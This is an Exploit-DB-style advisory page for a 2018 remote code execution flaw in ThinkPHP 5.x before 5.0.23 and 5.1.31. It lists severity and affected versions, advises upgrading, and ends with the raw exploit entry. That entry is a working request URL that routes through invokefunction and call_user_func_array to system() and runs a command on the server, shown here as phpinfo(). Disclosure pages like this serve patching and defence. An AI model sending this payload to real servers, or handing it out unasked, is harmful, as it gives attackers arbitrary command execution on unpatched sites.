header-logo
Suggest Exploit
vendor:
ThinkPHP
by:
VulnSpy
9.8
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: ThinkPHP
Affected Version From: v5.x
Affected Version To: v5.0.23,v5.1.31
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018

ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution

A remote code execution vulnerability exists in ThinkPHP 5.x below v5.0.23,v5.1.31. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request contains a payload that will execute arbitrary code on the server.

Mitigation:

Upgrade to ThinkPHP 5.0.23 or 5.1.31
Source

Exploit-DB raw data:

# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Date: 2018-12-11
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A

# Exploit

http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'